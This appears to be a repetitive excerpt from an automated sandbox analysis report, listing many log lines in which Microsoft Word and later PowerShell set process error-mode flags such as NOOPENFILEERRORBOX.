      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
